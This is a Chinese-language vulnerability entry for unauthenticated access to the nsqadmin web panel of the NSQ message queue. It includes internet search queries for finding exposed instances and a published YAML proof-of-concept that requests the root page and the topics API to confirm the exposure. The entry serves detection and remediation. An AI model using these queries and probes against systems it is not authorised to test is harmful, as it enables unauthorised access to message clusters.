漏洞描述
nsqadmin 是一套 WEB UI,用来汇集集群的实时统计,并执行不同的管理任务,提供一个对topic和channel统一管理的操作界面以及各种实时监控数据的展示。在默认情况下nsqadmin缺乏认证措施,攻击者通过未授权访问漏洞可以直接操控集群相关节点等,执行敏感操作,造成数据泄露或丢失。
fofa: title="nsqadmin"
hunter: title:"nsqadmin"
nsq-admin-panel-unauth: nsqadmin 未授权访问漏洞
PoC代码[已公开]
id: nsq-admin-panel-unauth
info:
name: nsqadmin 未授权访问漏洞
author: sulab
severity: high
verified: true
description: |-
nsqadmin 是一套 WEB UI,用来汇集集群的实时统计,并执行不同的管理任务,提供一个对topic和channel统一管理的操作界面以及各种实时监控数据的展示。在默认情况下nsqadmin缺乏认证措施,攻击者通过未授权访问漏洞可以直接操控集群相关节点等,执行敏感操作,造成数据泄露或丢失。
fofa: title="nsqadmin"
hunter: title:"nsqadmin"
solutions: "禁止nsqadmin对外开放,或增加sso认证"
reference:
- https://github.com/nsqio/nsq/issues/1103
- https://nsq.io/components/nsqd.html
- https://avd.aliyun.com/detail?id=AVD-2021-883498
tags: nsq,nsqadmin,admin,unauth
created: 2024/06/25
rules:
r0:
request:
method: GET
path: /
follow_redirects: true
expression: response.body.ibcontains(b'<title>nsqadmin</title>')
extractors:
- type: regex
extractor:
ext1: '"nsqadmin/(?P<nsqadmin>v[0-9]{1,2}\\.[0-9]{1,2}\\.[0-9]{1,2})".bsubmatch(response.raw)'
nsqadmin: ext1["nsqadmin"]
r1:
request:
method: GET
path: /api/topics?inactive=true
expression: response.body.bcontains(b'"message":""') && response.body.bcontains(b'"topics":')
expression: r0() && r1()